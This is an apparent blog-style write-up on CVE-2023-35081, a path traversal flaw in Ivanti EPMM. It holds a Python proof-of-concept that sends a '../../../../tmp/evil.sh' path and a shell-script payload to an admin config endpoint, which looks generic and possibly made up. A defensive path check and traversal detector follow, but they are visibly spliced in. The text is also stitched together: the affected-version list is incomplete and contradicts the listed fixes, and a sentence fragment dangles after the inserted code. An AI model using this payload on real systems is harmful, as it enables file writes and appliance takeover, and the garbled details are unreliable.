CVE-2023-35081 - Path Traversal Vulnerability in Ivanti EPMM Enables Authenticated Admins To Write Arbitrary Files
---
Introduction
In July 2023, cybersecurity professionals and vendors raised alarms over a new severe vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM). The bug—CVE-2023-35081—involves path traversal, a classic but dangerous attack vector. This flaw allows authenticated administrators to write files to arbitrary locations on targeted Ivanti EPMM appliances. Here, we’ll break down how this vulnerability works, provide a code example to show the attack, and discuss how you can protect your systems.
What is Ivanti EPMM?
Ivanti EPMM (previously known as MobileIron Core) is a mobile device management system used by enterprise networks worldwide. It’s a critical piece of infrastructure for IT teams, often exposed to organizational intranets and, in some cases, the public internet.
Affected versions:
- 11.8.x before 11.8.1.2
If you are running any of these versions, your system *can be compromised* by users with admin rights.
What is Path Traversal?
Path traversal, sometimes called “directory traversal,” is when an attacker manipulates file paths in input fields to break out of permitted directories and access files or locations that should be off-limits. Usually, it involves using “..” or “dot-dot-slash” sequences, like “../../,” to move up directory levels in the file system hierarchy.
How Does CVE-2023-35081 Work?
In the Ivanti EPMM vulnerability, the server-side logic does not properly sanitize administrator-supplied input when certain configuration files are updated through the web interface. The attacker must already hold admin credentials, but by crafting a file path that contains traversal sequences they can make the system write files *anywhere* on the server, potentially leading to appliance takeover or further escalation.
Exploit Overview
Let’s take a closer look at how an exploit could unfold. An attacker who is authenticated as an administrator can send crafted requests telling the server to write files at locations of their choosing.
1. An attacker logs in as an admin.
2. They use the web interface or an API endpoint to trigger a configuration update (the vulnerable functionality).
3. Instead of a legitimate file path, they supply a path like ../../../../tmp/evil.sh.
4. The server, not properly sanitizing the input, writes the configuration (or malicious payload) into /tmp/evil.sh.
Code Snippet: Path Traversal Request
Here’s a simple Python example demonstrating how an attacker could exploit this vulnerability by uploading a malicious shell script:
```python
import requests

# Change these to match your target
TARGET_URL = 'https://epmm.vulnerable-server.com/api/v1/update_config'
ADMIN_SESSION = {'JSESSIONID': 'your_admin_session_id'}

# The traversal sequence in config_path makes the server write the content to /tmp/evil.sh
payload = {
    "config_path": "../../../../tmp/evil.sh",
    "content": "#!/bin/bash\necho 'Hacked!'\n"
}

response = requests.post(
    TARGET_URL,
    cookies=ADMIN_SESSION,
    json=payload,
    verify=False  # Skip TLS certificate verification for demonstration ONLY
)

if response.status_code == 200:
    print("[+] Payload uploaded successfully!")
else:
    print(f"[-] Something went wrong: {response.status_code}")
```
*Disclaimer: This code is for educational use only and must not be used to attack systems you don’t own or have permission to test.*
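As an added example (not part of the original write-up and not Ivanti's code), the following shows the server-side pattern behind this class of bug next to a hardened path check, plus a small detector that flags traversal sequences in request logs; the CONFIG_DIR location, the config_path parameter name and the log line layout are assumptions, and the sample log lines are constructed.

```python
import os
import re
from pathlib import Path
from urllib.parse import unquote

# Directory the config-update handler may write into (assumed name; nothing is written to disk here).
CONFIG_DIR = Path("/var/tmp/epmm_demo/config")

def vulnerable_target(config_path: str) -> Path:
    # The bug pattern: join the admin-supplied path onto the base directory and normalise it.
    # '../../../../tmp/evil.sh' therefore becomes /tmp/evil.sh, outside CONFIG_DIR.
    return Path(os.path.normpath(CONFIG_DIR / config_path))

def safe_config_path(config_path: str) -> Path:
    # Hardened variant: reject empty, absolute and NUL-containing input, canonicalise
    # (symlinks included), then require the result to sit strictly below CONFIG_DIR.
    if not config_path or "\x00" in config_path or Path(config_path).is_absolute():
        raise ValueError("invalid config path")
    base = CONFIG_DIR.resolve()
    candidate = (base / config_path).resolve()
    if base not in candidate.parents:  # parents excludes candidate itself, so CONFIG_DIR alone is rejected
        raise ValueError("path escapes configuration directory")
    return candidate

def escapes_base(config_path: str) -> bool:
    # True if the hardened check rejects the path.
    try:
        safe_config_path(config_path)
    except ValueError:
        return True
    return False

# Detection side: a '..' segment bounded by separators (or string ends), after unwinding
# two layers of percent-encoding so %2e%2e%2f and %252e%252e%252f are caught as well.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def has_traversal(value: str) -> bool:
    return bool(TRAVERSAL_RE.search(unquote(unquote(value))))

# Constructed sample log lines (not real EPMM logs); the field layout is assumed.
SAMPLE_LOG = [
    '10.0.0.5 admin "POST /api/v1/update_config" config_path=server.yaml 200',
    '10.0.0.9 admin "POST /api/v1/update_config" config_path=../../../../tmp/evil.sh 200',
    '10.0.0.9 admin "POST /api/v1/update_config" config_path=%252e%252e%2f%252e%252e%2ftmp%2fevil.sh 200',
]

def flag_suspicious(lines):
    # Return the log lines whose config_path parameter carries a traversal sequence.
    return [ln for ln in lines if (m := re.search(r"config_path=(\S+)", ln)) and has_traversal(m.group(1))]
```

The containment check must run on the canonicalised path, not on the raw string, otherwise `config/../../tmp` style input and symlinks inside the base directory slip past a simple prefix comparison.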
Potentially pivot deeper into corporate networks.
NOTE: This exploit *requires* valid admin-level authentication. In real-world environments, however, disgruntled employees, overly trusting privilege models, and credential reuse all increase the risk.
Official References
- Ivanti Security Advisory
- NVD Entry
- Rapid7 Research
Mitigation & Recommendations
1. Update Immediately: Ivanti has released fixed versions. Upgrade to 11.10.0.3, 11.9.1.2, or 11.8.1.2 (or later).
2. Limit Admin Users: Restrict admin privileges to only those who need them, and watch for suspicious logins.
3. Network Segmentation: Limit device access to management interfaces. Never expose these to the public internet if you can help it.
Conclusion
CVE-2023-35081 is a severe vulnerability, as it lets administrators write files anywhere on the system. For organizations using Ivanti EPMM, it is critical to patch immediately and review who has admin access. Any delay puts your organization's mobile device fleet and broader network at risk.
Don’t overlook the importance of patching: once details are public, attackers move fast!
Stay safe, update your systems, and keep a close eye on critical infrastructure.
Timeline
Published on: 08/03/2023 18:15:00 UTC
Last modified on: 08/08/2023 20:25:00 UTC